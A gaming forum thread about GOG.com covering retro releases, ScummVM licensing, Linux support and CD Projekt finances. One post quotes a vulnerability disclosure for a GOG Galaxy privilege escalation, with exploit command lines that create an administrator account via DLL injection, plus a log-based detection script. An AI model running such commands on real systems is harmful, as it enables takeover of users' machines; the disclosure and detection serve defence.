GOG.com

DalekFlay

Arcane
Patron
Joined
Oct 5, 2010
Messages
14,118
Location
New Vegas
Leisure Suit Larry reboot for under $10 finally. Yay.

Can't wait to play it in 2035 or so.
 

El Presidente

Arcane
Joined
Nov 3, 2018
Messages
1,546
Location
Oval Office
What's a good way of keeping track of retro releases on GOG? The only place I check is this here thread.

Every 6 or so months I type on GOG search "Discworld", "Orion Burger", "Myth" to see if they finally got released, but nope. :negative:

Also Black Dahlia and Dark Colony, which aren't there too.
 

DalekFlay

Arcane
Patron
Joined
Oct 5, 2010
Messages
14,118
Location
New Vegas
What's a good way of keeping track of retro releases on GOG? The only place I check is this here thread.

Classic game releases are more rare now because of licensing issues and shit, so GOG usually makes a big deal about them with a news post. People here then link to the news post, so... you're probably doing fine? Also I wouldn't expect Discworld ever, unless someone like Nightdive puts in a ton of effort and investment. I said the same thing about Blade Runner though and then they did just that, so who knows...
 

Morpheus Kitami

Liturgist
Joined
May 14, 2020
Messages
2,476
What's a good way of keeping track of retro releases on GOG? The only place I check is this here thread.

Classic game releases are more rare now because of licensing issues and shit, so GOG usually makes a big deal about them with a news post. People here then link to the news post, so... you're probably doing fine? Also I wouldn't expect Discworld ever, unless someone like Nightdive puts in a ton of effort and investment. I said the same thing about Blade Runner though and then they did just that, so who knows...
Discworld will happen whenever they can steal use SCUMMVM as a shell. DOSbox apparently scares away boomers and SCUMMVM offers a nice, self-contained shell. No futzing around with anything, no weird old computering gibberish. Is it true? Does it matter? It seems most of the time GOG and Steam have SCUMMVM versions whenever possible. I know the people behind the engine are okay with it, but it's obvious that some companies are taking advantage of their generosity.
 

DalekFlay

Arcane
Patron
Joined
Oct 5, 2010
Messages
14,118
Location
New Vegas
Discworld will happen whenever they can steal use SCUMMVM as a shell. DOSbox apparently scares away boomers and SCUMMVM offers a nice, self-contained shell. No futzing around with anything, no weird old computering gibberish. Is it true? Does it matter? It seems most of the time GOG and Steam have SCUMMVM versions whenever possible. I know the people behind the engine are okay with it, but it's obvious that some companies are taking advantage of their generosity.

Well there's tons of GOG games that use Dosbox, but maybe for Nightdive and such it's a consideration.
 

LESS T_T

Arcane
Joined
Oct 5, 2012
Messages
13,582
ScummVM is released under GPLv2 which means the companies can use it as long as they release (or link) the source code as well. IIRC Nightdive used ScummVM only for Putt-Putt games re-releases. They can't use it for Blade Runner because GPLv2's "copyleft" policy is not compatible with console release.
 

Ismaul

Thought Criminal #3333
Patron
Joined
Apr 18, 2005
Messages
1,871,807
Location
On Patroll

Morpheus Kitami

Liturgist
Joined
May 14, 2020
Messages
2,476
Well there's tons of GOG games that use Dosbox, but maybe for Nightdive and such it's a consideration.
Looking up a few games that can use SCUMMVM, it seems random, even within one series. I guess I could be wrong.
ScummVM is released under GPLv2 which means the companies can use it as long as they release (or link) the source code as well. IIRC Nightdive used ScummVM only for Putt-Putt games re-releases. They can't use it for Blade Runner because GPLv2's "copyleft" policy is not compatible with console release.
True, but that doesn't stop them from doing it with the PC releases. And it sure seems funny that now that SCUMMVM has it working another engine recreation in KEX is happening. Seems to me to be fishy, but that's just me being a big thinker.
 

racofer

Thread Incliner
Joined
Apr 5, 2008
Messages
25,577
Location
Your ignore list.
https://www.positronsecurity.com/blog/2020-08-13-gog-galaxy_client-local-privilege-escalation_deuce/

GOG Galaxy Client Local Privilege Escalation Deuce
By jtesta on August 13, 2020


I reported a serious local privilege escalation flaw in GOG Galaxy Client on April 28, 2020, but my follow-up investigation (detailed below) found the vendor’s fix to be insufficient. By updating the proof-of-concept exploit code, it is possible to execute arbitrary commands as SYSTEM in GOG Galaxy Client v2.0.13 through v2.0.15 v2.0.19 (the latest as of this writing).

GOG did not reply that this issue was officially fixed, although changes were silently made at some point after the v2.0.15 release to stop the provided proof-of-concept tools from working. It is suspected that only minor changes were made to frustrate exploitation; an investigation is ongoing (See update below).

UPDATE (Aug. 13, 2020 @ 5:11PM): After an investigation, it was found that GOG simply updated the signing key used for verifying messages. This key has been recovered, and the proof-of-concept has been updated with it. This advisory now describes a 0-day vulnerability in GOG Galaxy Client v2.0.19 because GOG did not respond in good faith with a proper patch in 90 days, as per Google’s vulnerability disclosure policy (which GOG was made aware of during the initial contact; see Vendor Timeline, below).

Investigation of Prior Patch
The day before issuing my original advisory on April 28, 2020, I ran the proof-of-concept exploits against the fixed versions (v1.2.67 and v2.0.14). They no longer worked. Unfortunately, because GOG never told me the issues were actually fixed on February 27, 2020, I didn’t have a chance to do an in-depth follow-up investigation before publishing the advisory. I’ve since had the chance to look at their fix more deeply.

To start, I looked at the log file at C:\ProgramData\GOG.com\Galaxy\logs\GalaxyClientService.log to see if it reports anything when the old exploit is run. I found this:

2020-05-08 15:03:53.503 [Information][#1 (1)] [TID 7352][galaxy_service]: Received a message from process connected at '127.0.0.1:54963'.
2020-05-08 15:03:53.503 [Information][#1 (1)] [TID 7352][galaxy_service]: Determined sender to be 'C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.7_3.7.2032.0_x64__qbz5n2kfra8p0\python.exe' (PID: 8448)
2020-05-08 15:03:53.503 [Warning][#1 (1)] [TID 7352][galaxy_service]: The sender was not recognized as a trusted client.
2020-05-08 15:03:53.503 [Error][#1 (1)] [TID 7352][galaxy_service]: Received a forbidden request from an untrusted sender. Disconnecting.

That’s a big hint! It looks like the privileged process, GalaxyClientService.exe, matches the network client’s source TCP port number with the executable process that opened the socket. That’s how it figures out that the request is coming from the Python interpreter instead of the legitimate client (GalaxyClient.exe).

I immediately thought that this check can be circumvented with DLL injection.

Updating the Proof-of-Concept
Cue hours of re-implementing my Python proof-of-concept in C…

Ok, now I have a DLL that can be injected into GalaxyClient.exe which will issue the same HMAC-512-signed request as before. Let’s test it out:

C:\Users\user1\Desktop>galaxy_dll_inject_privesc.exe --key2 C:\Windows\System32\net.exe "user jtesta Abc*123Lol /add" "C:\\"
Starting GalaxyClientService...
Executing C:\Program Files (x86)\GOG Galaxy\GalaxyClient.exe...
PID of new GalaxyClient.exe process: 10296
Injecting DLL...
DLL injected. Waiting up to 30 seconds for pipe server to start...
Connected to pipe server. Sending command, args, and working directory...
Sent. Waiting for response...

Success!

Looks like it worked! Ok, now let’s add this new user to the local Administrators group:

C:\Users\user1\Desktop>galaxy_dll_inject_privesc.exe --key2 C:\Windows\System32\net.exe "localgroup Administrators jtesta /add" "C:\\"
Starting GalaxyClientService...
Executing C:\Program Files (x86)\GOG Galaxy\GalaxyClient.exe...
PID of new GalaxyClient.exe process: 8112
Injecting DLL...
DLL injected. Waiting up to 30 seconds for pipe server to start...
Connected to pipe server. Sending command, args, and working directory...
Sent. Waiting for response...

Success!

Let’s verify that this user exists and is part of the Administrators group:

C:\Users\user1\Desktop>net user jtesta
User name jtesta
[...]
Local Group Memberships *Administrators *Users
[...]
The command completed successfully.

SUCCESS!

Proof-Of-Concept Exploit Tools
Pre-compiled binaries and source code for the updated proof-of-concept tools (which work on GOG Galaxy v2.0.13 through v2.0.19) are available here: gog_galaxy_updated_poc_v2.zip (gog_galaxy_updated_poc_v2.zip.sig)

GPG Key: jtesta.asc (9C61 F6A9 A3E9 BCA0 04A6 3C66 E44F 5FD3 B799 916A)

Vendor Contact Timeline
May 12, 2020: Contact with GOG.com Support was made using the same ticket (#535258) as the original advisory.

June 4, 2020: GOG.com Support replied with:

“I was informed that our Developers are working on fixing the issue, but executing the attack requires the machine to be already compromised.”

Because this sounded like GOG was not taking the issue seriously, I responded with:

“It is indeed true that an attacker must have low-privilege access to the machine already. But the problem is that this can be escalated into Administrator rights by abusing the GalaxyClientService software. […] Local privilege escalation (LPE) is a serious vulnerability. GOG customers may install software/games from other untrusted sources without Administrator rights, which normally would protect them from full system compromise. Unfortunately, due to the vulnerabilities I’ve discovered in GalaxyClientService, all user accounts are effectively administrators.”

August 13, 2020: No response received from vendor after 90 days, as per Google’s vulnerability disclosure policy (which GOG was informed of). GOG did not reply with any fix information.

UPDATE (Aug. 13, 2020 @ 5:11PM): After this advisory was publicly released, GOG.com Support responded with:

“Our Developers reevaluated the reported issue and think that it will take them around 3 months to create a solution, because it demands a major design change. Would it be possible to postpone the public release of your findings by 3 months so they have time to implement and test this solution?”

Because this was received after the advisory was already published, the request was deemed moot.


Explanation of 0-Day Exploit Release
(Section added on Aug. 13, 2020 @ 5:11PM)

As of the time of original publication (the morning of August 13), the proof-of-concept tool released worked on v2.0.13 - v2.0.15 only; it did not work on the latest version (v2.0.19) for unknown reasons. Hours later, an investigation revealed that GOG silently updated the message-signing key some time between the release of v2.0.16 and v2.0.19 in order to prevent the exploit from working. This was not a good-faith attempt at addressing the security vulnerability for two reasons:

1.) As my first GOG Galaxy Client advisory clearly showed, secret keys cannot be used to verify messages, since an attacker can easily extract those keys. GOG already knew since January that this would not solve the core design problem.

2.) In private communication on May 12, I made note that I strongly suspected this would require an extensive re-design, and that I would be happy to help (for free) to ensure that a proper & comprehensive fix would be shipped to end users. No response regarding this offer was received (in fact, no response was received at all until the deadline had passed).

Because it reasonably seems that GOG is no longer acting in good-faith regarding this matter, I’ve updated the proof-of-concept again with the new signing key. Hence, as of August 13, this is a 0-day vulnerability affecting GOG Galaxy Client v2.0.19.

What a train wreck. GOG handled this in the worst way possible, first with a "make this go away" fix which did not fix anything, then by ignoring the issue until it was made public.
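
The GalaxyClientService.log entries quoted in the advisory above can be turned into a simple detection. This is an added example, not part of the post or the advisory; it assumes that the lines for one request share a TID as in the quoted excerpt, and the sample lines after the first four are constructed (hypothetical path, PIDs, TIDs and ports).

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# First four lines are the excerpt quoted in the advisory; the rest are constructed
# in the same format (hypothetical path, PIDs, TIDs, ports) to exercise the parser.
SAMPLE_LOG = r"""
2020-05-08 15:03:53.503 [Information][#1 (1)] [TID 7352][galaxy_service]: Received a message from process connected at '127.0.0.1:54963'.
2020-05-08 15:03:53.503 [Information][#1 (1)] [TID 7352][galaxy_service]: Determined sender to be 'C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.7_3.7.2032.0_x64__qbz5n2kfra8p0\python.exe' (PID: 8448)
2020-05-08 15:03:53.503 [Warning][#1 (1)] [TID 7352][galaxy_service]: The sender was not recognized as a trusted client.
2020-05-08 15:03:53.503 [Error][#1 (1)] [TID 7352][galaxy_service]: Received a forbidden request from an untrusted sender. Disconnecting.
2020-05-08 15:07:10.120 [Information][#1 (1)] [TID 9001][galaxy_service]: Received a message from process connected at '127.0.0.1:50001'.
2020-05-08 15:07:10.120 [Information][#1 (1)] [TID 9001][galaxy_service]: Determined sender to be 'C:\Users\user1\Desktop\example_tool.exe' (PID: 4242)
2020-05-08 15:07:10.121 [Error][#1 (1)] [TID 1111][galaxy_service]: Received a forbidden request from an untrusted sender. Disconnecting.
2020-05-08 15:07:10.122 [Warning][#1 (1)] [TID 9001][galaxy_service]: The sender was not recognized as a trusted client.
2020-05-08 15:07:10.122 [Error][#1 (1)] [TID 9001][galaxy_service]: Received a forbidden request from an untrusted sender. Disconnecting.
"""

LINE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+) "
    r"\[(?P<level>\w+)\]\[#\d+ \(\d+\)\] \[TID (?P<tid>\d+)\]"
    r"\[galaxy_service\]: (?P<msg>.*)$"
)
CONNECTED = re.compile(r"Received a message from process connected at '([^']+)'")
SENDER = re.compile(r"Determined sender to be '(.+)' \(PID: (\d+)\)")
REJECTED = "Received a forbidden request from an untrusted sender"


@dataclass
class RejectedRequest:
    timestamp: str
    endpoint: Optional[str]      # loopback address:port the request came from
    sender_path: Optional[str]   # executable the service attributed the socket to
    pid: Optional[int]


def _blank() -> dict:
    return {"endpoint": None, "path": None, "pid": None}


def find_rejected_requests(log_text: str) -> List[RejectedRequest]:
    """Correlate lines per service thread (TID) and return every rejected request."""
    pending: Dict[str, dict] = {}
    alerts: List[RejectedRequest] = []
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # blank or unrelated line
        tid, msg = m["tid"], m["msg"]
        if (c := CONNECTED.search(msg)):
            pending[tid] = {**_blank(), "endpoint": c.group(1)}
        elif (s := SENDER.search(msg)):
            state = pending.setdefault(tid, _blank())
            state["path"], state["pid"] = s.group(1), int(s.group(2))
        elif m["level"] == "Error" and REJECTED in msg:
            # Context may be missing if the log was rotated or truncated.
            state = pending.pop(tid, _blank())
            alerts.append(RejectedRequest(m["ts"], state["endpoint"],
                                          state["path"], state["pid"]))
    return alerts


if __name__ == "__main__":
    for alert in find_rejected_requests(SAMPLE_LOG):
        print(alert)
```

Per the advisory, a request issued from inside GalaxyClient.exe passes the sender check, so these entries only surface attempts made from other processes. An empty result therefore does not show that the service was not abused.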
 

Bad Sector

Arcane
Patron
Joined
Mar 25, 2012
Messages
2,223
Note that this issue requires that you run some other executable which takes advantage of it first - it won't happen just by having GOG Galaxy installed (also note that not running GOG Galaxy won't solve the issue - it is the GOG Galaxy service that allows the escalation). So for this to be a real issue you need to either download lots of random executables from shady places (at which point you play with fire and get burnt, as expected) or you fall victim to a chain of passer-by attacks where you, e.g., visit a site that takes advantage of a browser exploit (be it the site itself or, often more likely, through a compromised ad - assuming you do not have an ad blocker) which causes a payload to enter your PC which itself locates and communicates with the GOG service to run stuff as Administrator (and then does whatever else it wants to do, like installing some background service to encrypt your files for ransom).

If any of the above is not the case (e.g. you have no GOG Galaxy, you do not download and run executables from shady places, you do not visit said shady places in the first place, you have an ad blocker that would block compromised ads, your browser does not have any exploit that the compromised ad/shady site can take advantage of, etc) then you are not affected by it.
 

cosmicray

Savant
Joined
Jan 20, 2019
Messages
436
Like some developers already said, it is not worth it. The costs to support Linux outweigh any possible profits due to its extremely low user base and higher tech support requirements due to the multitude of Linux environments.
Either way, GOG should have made their client on Linux if they sell Linux games.

Btw, is GOG's integration an open API (or whatever)? Because if it ain't and every store needs to officially go through GOG to have them integrated then it is also decline.
 

Bad Sector

Arcane
Patron
Joined
Mar 25, 2012
Messages
2,223
Like some developers already said, it is not worth it. The costs to support Linux outweigh any possible profits due to its extremely low user base and higher tech support requirements due to the multitude of Linux environments.

Depends highly on how portable their codebase and tech is and since it also works on macOS which is a very different environment than Windows, I'm going to guess that it is portable.

As for the multitude of Linux environments, this is a non-issue: they can either officially support only a single distribution like Steam does and leave the rest to the community, or they can specify exactly which system-side components their client needs to work (which IMO is the best approach). E.g. they can say "we need Xorg at least version <whatever>, Qt at least version <whichever>, Kernel version <something>" - after all pretty much all desktop oriented distros have more or less the same components, it isn't like writing a program on Red Hat won't work on Debian or Slackware with the right libraries. Distributions just provide preinstalled libraries and applications, they do not change the file formats or use a different kernel ABI or whatever, as long as a distribution has the libraries you need (which you can ask for), your programs will work.
 

infidel

StarInfidel
Developer
Joined
May 6, 2019
Messages
494
What's a good way of keeping track of retro releases on GOG? The only place I check is this here thread.

Every 6 or so months I type on GOG search "Discworld", "Orion Burger", "Myth" to see if they finally got released, but nope. :negative:

Also Black Dahlia and Dark Colony, which aren't there too.

They have an RSS feed, you know: http://www.gog.com/frontpage/rss
 

ADL

Prophet
Joined
Oct 23, 2017
Messages
3,682
Location
Nantucket
Made use of that QuakeCon sale that's ending soon. I don't usually buy games twice but the convenience of having all Todd's broken games pre-patched is worth a couple bucks as someone that frequently hops distros and reinstalls Windows.
yRVKUvD.png

Looking forward to playing Battlespire again. I haven't played that since the late 90s.
 

DalekFlay

Arcane
Patron
Joined
Oct 5, 2010
Messages
14,118
Location
New Vegas
Not gonna pretend I don't own them on GOG too, but prepare for the Codex to bring fire and steel upon you for buying Oblivion and Fallout 3.
 
Unwanted

Horvatii

Unwanted
Joined
Dec 15, 2019
Messages
563
What a train wreck. GOG handled this in the worst way possible, first with a "make this go away" fix which did not fix anything, then by ignoring the issue until it was made public.

It's not really a big deal.
The first exploit was serious because the GOG service was not verifying where the command to execute a binary is coming from. So you could theoretically go from Guest to SYSTEM, executing anything a Guest can't and modifying anything, which is baaad, mkay.
But the second exploit is the same as the one Steam won't fix. Reason below.

To start, I looked at the log file at C:\ProgramData\GOG.com\Galaxy\logs\GalaxyClientService.log to see if it reports anything when the old exploit is run. I found this:

2020-05-08 15:03:53.503 [Information][#1 (1)] [TID 7352][galaxy_service]: Received a message from process connected at '127.0.0.1:54963'.
2020-05-08 15:03:53.503 [Information][#1 (1)] [TID 7352][galaxy_service]: Determined sender to be 'C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.7_3.7.2032.0_x64__qbz5n2kfra8p0\python.exe' (PID: 8448)
2020-05-08 15:03:53.503 [Warning][#1 (1)] [TID 7352][galaxy_service]: The sender was not recognized as a trusted client.
2020-05-08 15:03:53.503 [Error][#1 (1)] [TID 7352][galaxy_service]: Received a forbidden request from an untrusted sender. Disconnecting.

That’s a big hint! It looks like the privileged process, GalaxyClientService.exe, matches the network client’s source TCP port number with the executable process that opened the socket. That’s how it figures out that the request is coming from the Python interpreter instead of the legitimate client (GalaxyClient.exe).

I immediately thought that this check can be circumvented with DLL injection.

See, now the GOG service is looking who the sender of the command is. And the hacker ASSUMES that it only checks the TCP port and binary path. But that's not given, without reversing the GOG service. If the GOG service is verifying the legitimate GalaxyClient.exe binary (as I guess it does), then the second exploit requires ADMIN privileges. Because you cannot do DLL injection without ADMIN, or rather debug privs on your injector. And once you have ADMIN, you don't need SYSTEM. And that's also the reason Steam won't fix their little hole.

So, the original exploit was a nice local priv escalation. The follow up is just crying. Windows' own PsExec.exe tool can elevate from admin to system with -s.
 

racofer

Thread Incliner
Joined
Apr 5, 2008
Messages
25,577
Location
Your ignore list.
I usually check the financial reports from CD Projekt. They are available quarterly at their website for anyone to check: https://www.cdprojekt.com/en/investors/result-center/

Here is one interesting bit this year:
KhhAUQo.png


Look at these fat, yummy numbers:
ZQVuz92.png


CD Projekt stronk!

I would be curious to know the numbers from Steam during this pandemic, but since they are not publicly traded there is no way to know.
 

Rahdulan

Omnibus
Patron
Joined
Oct 26, 2012
Messages
5,105
GOG is really working on a thin profit margin. I guess pursuing all those potential games to secure the rights to sell on GOG makes for killer operating costs.
 
